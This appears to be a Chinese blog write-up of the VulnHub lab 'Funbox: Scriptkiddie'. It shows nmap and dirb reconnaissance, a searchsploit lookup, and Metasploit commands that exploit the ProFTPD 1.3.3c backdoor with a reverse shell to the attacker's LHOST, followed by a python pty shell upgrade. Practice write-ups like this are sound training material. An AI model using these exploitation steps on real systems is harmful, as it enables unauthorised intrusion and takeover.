一、环境搭建

靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub

百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9

二、信息收集

1.nmap命令扫描靶机

先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip

再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112

2.利用扫描到端口

(1)开放21、22、80等端口,先访问80端口吧

(2)进行目录探测,看看他有没有给我们一些提示:dirb http://192.168.101.112

(3)发现利用WordPress网站这条路行不通

3.SearchSploit漏洞查找工具

(1)利用21端口,在kali输入:searchsploit ProFTPD 1.3.3c

发现可以利用的后门代码

三、渗透

msfconsole框架

1.搜索proFTPD 1.3.3c可利用的脚本:search ProFTPD 1.3.3c

2.使用该脚本:use exploit/unix/ftp/proftpd_133c_backdoor

3.查看需要设置的参数:show options

4.设置RHOSTS(靶机):set RHOSTS 192.168.101.112

5.查看一下payloads的脚本:show payloads

使用反向6.链接的脚本:set payloads 3

查看要设置参数:show options

7.设置LHOST(攻击机): set LHOST 192.168.101.10

8.使用run开启攻击:

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9.进入到root,发现了一个flag文件

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie相关推荐

  1. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  2. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  3. 靶场练习第十二天~vulnhub靶场之dc-4

    一.准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二.信息收集 1.nmap的信息收集 (1)主机发现 命令:nmap 19 ...

  4. 靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH

    前期准备: 靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw kali攻击机ip:192.168.101.10 靶机地 ...

  5. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  6. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  7. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  8. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  9. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

最新文章

  1. 7个珍藏多年的网站,颠覆你的想象,值得收藏起来!
  2. 前端基础--javascript 基础
  3. rsync+innotify实现实时同步
  4. oracle创建表分区表,oracle创建分区表
  5. python 是什么类型的语言-python是一种什么类型的语言
  6. lumion自动保存_LUMION吊打MAX,轻松玩转规划渲染!
  7. 力扣——寻找两个有序数组的中位数
  8. 成功男士的健康心理特征
  9. 可悲的外企Infrastructure - 些须感触(杂)
  10. iText 生成复杂表格
  11. GAE研究小组:面向对象与面向过程的工程化理解
  12. Python项目开发基础 -- with open (filename) as 读写文件
  13. 2020-07-17
  14. 在线画图工具(流程图、E-R图等)
  15. 设计模式学习——代理模式(proxy)
  16. adb命令之service call
  17. 小学生5年级计算机书,小学五年级作文:眼镜、电脑、书
  18. 前端网页设计内容二《电商平台网站》
  19. LQ_IM68A硅麦测试报告
  20. PTA团体程序设计天梯赛-练习集

热门文章

  1. mysql 聚簇索引和非聚簇索引_图文并茂,说说MySQL索引
  2. eclipse中在类saolei.Test 中找不到main方法
  3. Aspcms框架的webshell
  4. Linux的slab和nginx的区别,Nginx核心知识100讲》nginx Slab管理器
  5. 使用display:none和visibility:hidden隐藏的区别
  6. background使用
  7. IDEA插件之 CodeGlance
  8. 对request.getSession(false)的理解(附程序员常疏忽的一个漏洞)
  9. php数据库备份脚本
  10. 原生js使用forEach()与jquery使用each遍历数组,return false 的区别